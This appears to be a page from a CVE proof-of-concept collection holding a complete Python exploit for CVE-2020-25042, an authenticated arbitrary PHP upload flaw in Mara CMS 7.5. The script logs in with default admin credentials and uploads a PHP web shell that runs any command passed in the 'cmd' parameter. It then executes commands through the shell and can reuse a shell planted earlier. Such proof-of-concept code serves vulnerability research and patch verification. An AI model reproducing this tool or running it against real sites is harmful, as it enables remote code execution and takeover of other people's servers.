5585 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cve_2020_25042.py PY
from __future__ import annotations

import argparse
import base64
import hashlib
import random
import re
import string
import sys
import urllib.parse
from datetime import datetime, timezone

try:
    import requests
    import urllib3
except Exception:
    requests = None
    urllib3 = None


if urllib3 is not None:
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

RESET = "\033[0m"
BOLD = "\033[1m"
DIM = "\033[2m"
GREEN = "\033[32m"
CYAN = "\033[36m"
YELLOW = "\033[33m"
RED = "\033[31m"

DEFAULT_PAGE = "lorem.php"
DEFAULT_USERNAME = "admin"
DEFAULT_PASSWORD = "changeme"
DEFAULT_CMD = "id"
DEFAULT_TIMEOUT = 20
DEFAULT_SHELL_NAME = "mara-poc.php"
PAYLOAD_MARKER = "MARA_CVE_2020_25042_OK"
USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
AJAX_USER_AGENT = "Firefoxy"
EMPTY_SHA256 = hashlib.sha256(b"").hexdigest()


class Console:
    def __init__(
        self,
        only_final: bool = False,
        no_color: bool = False,
        debug_enabled: bool = False,
    ) -> None:
        self.only_final = only_final
        self.no_color = no_color or not sys.stdout.isatty()
        self.debug_enabled = debug_enabled

    def color(self, text: str, code: str) -> str:
        if self.no_color:
            return text
        return f"{code}{text}{RESET}"

    def log(self, marker: str, message: str, color: str = RESET) -> None:
        if self.only_final:
            return
        ts = datetime.now(timezone.utc).isoformat(timespec="seconds").replace("+00:00", "Z")
        prefix = self.color(f"[{ts}]", DIM)
        print(f"{prefix} {self.color(marker, color)} {message}", flush=True)

    def info(self, message: str) -> None:
        self.log("[*]", message, CYAN)

    def ok(self, message: str) -> None:
        self.log("[+]", message, GREEN)

    def warn(self, message: str) -> None:
        self.log("[!]", message, YELLOW)

    def error(self, message: str) -> None:
        self.log("[-]", message, RED)

    def debug(self, message: str) -> None:
        if self.debug_enabled:
            self.log("[d]", message, DIM)

    def result(self, title: str, content: str) -> None:
        if self.only_final:
            print(content.strip())
            return
        print("")
        print(self.color(f"[+] {title}", BOLD + GREEN))
        print(content.rstrip())


console = Console()


def log_info(message: str) -> None:
    console.info(message)


def log_success(message: str) -> None:
    console.ok(message)


def log_warning(message: str) -> None:
    console.warn(message)


def log_error(message: str) -> None:
    console.error(message)


def sha256_hex(value: str) -> str:
    return hashlib.sha256(value.encode("utf-8")).hexdigest()


def b64(value: str) -> str:
    return base64.b64encode(value.encode("utf-8")).decode("ascii")


def b64_decode(value: str) -> str:
    return base64.b64decode(value.encode("ascii"), validate=False).decode("utf-8", "ignore")


def random_php_name() -> str:
    suffix = "".join(random.choices(string.ascii_lowercase + string.digits, k=8))
    return f"mara-poc-{suffix}.php"


def ensure_scheme(url: str) -> str:
    if url.startswith(("http://", "https://")):
        return url
    return f"http://{url}"


def default_payload() -> str:
    return (
        "<?php\n"
        f'echo "{PAYLOAD_MARKER}\\n";\n'
        'if (isset($_GET["cmd"])) {\n'
        '    system($_GET["cmd"]);\n'
        "}\n"
        "?>\n"
    )


class MaraCMSCVE202025042:
    def __init__(
        self,
        base_url: str,
        page: str,
        username: str,
        password: str,
        shell_name: str,
        command: str,
        destdir: str,
        shell_url_path: str | None,
        payload: str,
        timeout: int,
        verify_tls: bool,
        force_upload: bool,
    ) -> None:
        self.base_url = ensure_scheme(base_url).rstrip("/")
        self.page = page.lstrip("/")
        self.username = username
        self.password = password
        self.shell_name = shell_name
        self.command = command
        self.destdir = destdir
        self.shell_url_path = shell_url_path
        self.payload = payload
        self.timeout = timeout
        self.verify_tls = verify_tls
        self.force_upload = force_upload

        self.session = requests.Session()
        self.session.headers.update({"User-Agent": USER_AGENT})
        self.shash = ""
        self.nacl = ""
        self.password_hash = ""
        self.salted_password_hash = ""
        self.imgdir = "img/"
        self.last_raw_response = ""

    def url(self, path: str) -> str:
        return f"{self.base_url}/{path.lstrip('/')}"

    def origin_url(self, path: str) -> str:
        parsed = urllib.parse.urlparse(self.base_url)
        origin = f"{parsed.scheme}://{parsed.netloc}"
        return f"{origin}/{path.lstrip('/')}"

    def request(
        self,
        method: str,
        path: str,
        *,
        params: dict[str, str] | None = None,
        data: dict[str, str] | list[tuple[str, str]] | None = None,
        files: dict[str, tuple[str, str, str]] | None = None,
        headers: dict[str, str] | None = None,
        allow_redirects: bool = True,
    ) -> requests.Response:
        target = self.url(path)
        console.debug(f"{method.upper()} {target}")

        try:
            response = self.session.request(
                method=method,
                url=target,
                params=params,
                data=data,
                files=files,
                headers=headers,
                timeout=self.timeout,
                allow_redirects=allow_redirects,
                verify=self.verify_tls,
            )
        except requests.RequestException as error:
            log_error(f"Request failed: {error}")
            sys.exit(1)

        console.debug(f"HTTP {response.status_code} from {response.url}")
        return response

    def ajax_fields(
        self,
        action: str,
        *,
        usr: str = "",
        password_hash: str = "",
        salted_password_hash: str = "",
        authenticated: str = "",
        rawresponse: str = "",
        response: str = "",
        status: str = "Sending Request",
    ) -> dict[str, str]:
        return {
            "usr": b64(usr),
            "hash": b64(password_hash),
            "pwd": b64(salted_password_hash),
            "authenticated": b64(authenticated),
            "action": b64(action),
            "headsection": b64(""),
            "data": b64(""),
            "enccrc": EMPTY_SHA256,
            "crc": b64(""),
            "srcfile": b64(""),
            "destfile": b64(""),
            "rawresponse": b64(rawresponse),
            "response": b64(response),
            "status": b64(status),
            "error": b64(""),
        }

    def parse_ajax_response(self, text: str) -> str:
        parts = text.split("~::~")
        if len(parts) < 3 or not parts[1]:
            return ""
        try:
            return b64_decode(parts[1])
        except Exception:
            return ""

    def load_login_page(self) -> None:
        log_info("Loading Mara CMS page and collecting session data")

        response = self.request(
            "GET",
            self.page,
            params={"login": self.username},
        )

        if response.status_code != 200:
            log_error(f"Could not load login page | HTTP {response.status_code}")
            sys.exit(1)

        shash_match = re.search(r"shash=['\"]([^'\"]+)['\"]", response.text)
        if not shash_match:
            log_error("Could not find shash in page source")
            sys.exit(1)

        imgdir_match = re.search(r"var\s+imgdir=['\"]([^'\"]+)['\"]", response.text)
        if imgdir_match and imgdir_match.group(1):
            self.imgdir = imgdir_match.group(1)

        self.shash = shash_match.group(1)
        log_success(f"Found shash: {self.shash}")
        console.debug(f"Image directory: {self.imgdir}")

    def get_salt(self) -> None:
        log_info("Requesting login salt")

        response = self.request(
            "POST",
            "codebase/handler.php",
            params={"nocache": str(random.random())},
            data=self.ajax_fields("setsalt"),
            headers={
                "User-Agent": AJAX_USER_AGENT,
                "Content-Type": "application/x-www-form-urlencoded",
            },
        )

        if response.status_code != 200:
            log_error(f"Could not get salt | HTTP {response.status_code}")
            sys.exit(1)

        salt = self.parse_ajax_response(response.text)
        if not salt:
            log_error("Could not parse salt from handler response")
            console.debug(response.text[:300].replace("\n", " "))
            sys.exit(1)

        self.nacl = salt
        self.last_raw_response = response.text
        log_success(f"Got salt: {self.nacl}")

    def login(self) -> None:
        self.load_login_page()
        self.get_salt()

        self.password_hash = sha256_hex(f"{self.password}{self.shash}{self.username}")
        self.salted_password_hash = sha256_hex(f"{self.password_hash}{self.nacl}")

        log_info(f"Logging in as {self.username}")

        response = self.request(
            "POST",
            "codebase/handler.php",
            params={"nocache": str(random.random())},
            data=self.ajax_fields(
                "login",
                usr=self.username,
                password_hash=self.password_hash,
                salted_password_hash=self.salted_password_hash,
                rawresponse=self.last_raw_response,
            ),
            headers={
                "User-Agent": AJAX_USER_AGENT,
                "Content-Type": "application/x-www-form-urlencoded",
            },
        )

        decoded = self.parse_ajax_response(response.text)
        if response.status_code != 200 or not decoded.startswith("OK"):
            log_error("Login failed")
            if decoded:
                log_error(f"Handler response: {decoded}")
            else:
                console.debug(response.text[:300].replace("\n", " "))
            sys.exit(1)

        log_success(f"Login successful: {decoded}")

    def open_upload_form(self) -> None:
        log_info("Opening upload form")

        first = self.request("GET", "codebase/dir.php", params={"type": "filenew"})
        if first.status_code != 200:
            log_warning(f"Upload page returned HTTP {first.status_code}")

        iframe = self.request(
            "GET",
            "codebase/dir.php",
            params={"iframe": "1", "type": "filenew"},
        )
        if iframe.status_code != 200:
            log_warning(f"Upload iframe returned HTTP {iframe.status_code}")

    def upload_shell(self) -> None:
        log_info(f"Uploading PHP payload as {self.shell_name}")

        form = [
            ("authenticated", b64("1")),
            ("action", b64("upload")),
            ("MAX_FILE_SIZE", "10485760"),
            ("type", "filenew"),
            ("usr", b64(self.username)),
            ("pwd", b64(self.salted_password_hash)),
            ("authenticated", b64("1")),
            ("destdir", self.destdir),
        ]

        files = {
            "files[]": (
                self.shell_name,
                self.payload,
                "application/x-php",
            )
        }

        response = self.request(
            "POST",
            "codebase/handler.php",
            data=form,
            files=files,
            headers={"Referer": self.url("codebase/dir.php?type=filenew")},
        )

        if response.status_code not in (200, 302):
            log_error(f"Upload failed | HTTP {response.status_code}")
            if response.text:
                log_error(response.text[:300].replace("\n", " "))
            sys.exit(1)

        log_success("Upload request completed")
        console.debug(response.text[:300].replace("\n", " "))

    def shell_url(self) -> str:
        if self.shell_url_path:
            parsed = urllib.parse.urlparse(self.shell_url_path)
            if parsed.scheme and parsed.netloc:
                return self.shell_url_path
            if self.shell_url_path.startswith("/"):
                return self.origin_url(self.shell_url_path)
            return self.url(self.shell_url_path)

        if self.destdir:
            path = self.destdir.strip("/")
        else:
            path = self.imgdir.strip("/")

        if path:
            return self.url(f"{path}/{self.shell_name}")
        return self.url(self.shell_name)

    def execute_command(self) -> None:
        shell_url = self.shell_url()
        log_success(f"Shell URL: {shell_url}")
        log_info(f"Executing command: {self.command}")

        try:
            response = self.session.get(
                shell_url,
                params={"cmd": self.command},
                timeout=self.timeout,
                verify=self.verify_tls,
            )
        except requests.RequestException as error:
            log_error(f"Command request failed: {error}")
            sys.exit(1)

        if response.status_code != 200:
            log_error(f"Command execution failed | HTTP {response.status_code}")
            if response.text:
                log_error(response.text[:300].replace("\n", " "))
            sys.exit(1)

        console.result("Command output", response.text)

    def shell_is_reusable(self) -> bool:
        shell_url = self.shell_url()
        log_info(f"Checking existing shell: {shell_url}")

        try:
            response = self.session.get(
                shell_url,
                params={"cmd": "echo reusable"},
                timeout=self.timeout,
                verify=self.verify_tls,
            )
        except requests.RequestException as error:
            console.debug(f"Reusable shell check failed: {error}")
            return False

        if response.status_code != 200:
            console.debug(f"Reusable shell check returned HTTP {response.status_code}")
            return False

        if PAYLOAD_MARKER not in response.text:
            console.debug("Reusable shell marker was not found")
            return False

        log_success("Existing shell is reusable")
        return True

    def run(self, execute: bool) -> None:
        if not self.force_upload and self.shell_is_reusable():
            if execute:
                self.execute_command()
            else:
                log_success(f"Reusable shell: {self.shell_url()}")
            return

        self.login()
        self.open_upload_form()
        self.upload_shell()

        if execute:
            self.execute_command()
            return

        log_success(f"Uploaded shell: {self.shell_url()}")


def read_payload(path: str | None) -> str:
    if not path:
        return default_payload()

    try:
        with open(path, "r", encoding="utf-8") as file:
            return file.read()
    except OSError as error:
        log_error(f"Could not read payload file: {error}")
        sys.exit(1)


def main() -> None:
    parser = argparse.ArgumentParser(
        description="CVE-2020-25042 Mara CMS 7.5 authenticated arbitrary PHP upload PoC"
    )

    parser.add_argument(
        "--url",
        required=True,
        help="Mara CMS base URL. Example: http://target/cms",
    )
    parser.add_argument(
        "--page",
        default=DEFAULT_PAGE,
        help=f"Existing CMS page used for login bootstrap. Default: {DEFAULT_PAGE}",
    )
    parser.add_argument(
        "--username",
        default=DEFAULT_USERNAME,
        help=f"CMS username. Default: {DEFAULT_USERNAME}",
    )
    parser.add_argument(
        "--password",
        default=DEFAULT_PASSWORD,
        help=f"CMS password. Default: {DEFAULT_PASSWORD}",
    )
    parser.add_argument(
        "--shell-name",
        default=DEFAULT_SHELL_NAME,
        help=f"Name for uploaded PHP file. Default: {DEFAULT_SHELL_NAME}",
    )
    parser.add_argument(
        "--cmd",
        default=DEFAULT_CMD,
        help=f"Command to run after upload. Default: {DEFAULT_CMD}",
    )
    parser.add_argument(
        "--destdir",
        default="",
        help="Raw upload destdir form value. Default leaves Mara CMS using img/",
    )
    parser.add_argument(
        "--shell-url-path",
        help="Override shell URL/path if the file is exposed outside img/. Example: /cms/webshell.php",
    )
    parser.add_argument(
        "--payload-file",
        help="Custom PHP payload file to upload. Default payload runs commands from ?cmd=",
    )
    parser.add_argument(
        "--upload-only",
        action="store_true",
        help="Upload payload but do not execute --cmd",
    )
    parser.add_argument(
        "--force-upload",
        action="store_true",
        help="Always login and upload the payload, even if a reusable shell exists",
    )
    parser.add_argument(
        "--timeout",
        type=int,
        default=DEFAULT_TIMEOUT,
        help=f"HTTP timeout in seconds. Default: {DEFAULT_TIMEOUT}",
    )
    parser.add_argument(
        "--verify-tls",
        action="store_true",
        help="Verify TLS certificates",
    )
    parser.add_argument(
        "--only-final",
        action="store_true",
        help="Hide progress logs and print only command output",
    )
    parser.add_argument(
        "--no-color",
        action="store_true",
        help="Disable ANSI colors",
    )
    parser.add_argument(
        "--debug",
        action="store_true",
        help="Show request URLs and handler snippets",
    )

    args = parser.parse_args()

    global console
    console = Console(
        only_final=args.only_final,
        no_color=args.no_color,
        debug_enabled=args.debug,
    )

    if requests is None:
        log_error("Missing dependency: requests. Install it with: pip install requests")
        sys.exit(2)

    if not args.shell_name.endswith(".php"):
        log_error("--shell-name must end with .php")
        sys.exit(1)

    exploit = MaraCMSCVE202025042(
        base_url=args.url,
        page=args.page,
        username=args.username,
        password=args.password,
        shell_name=args.shell_name,
        command=args.cmd,
        destdir=args.destdir,
        shell_url_path=args.shell_url_path,
        payload=read_payload(args.payload_file),
        timeout=args.timeout,
        verify_tls=args.verify_tls,
        force_upload=args.force_upload,
    )

    exploit.run(execute=not args.upload_only)


if __name__ == "__main__":
    main()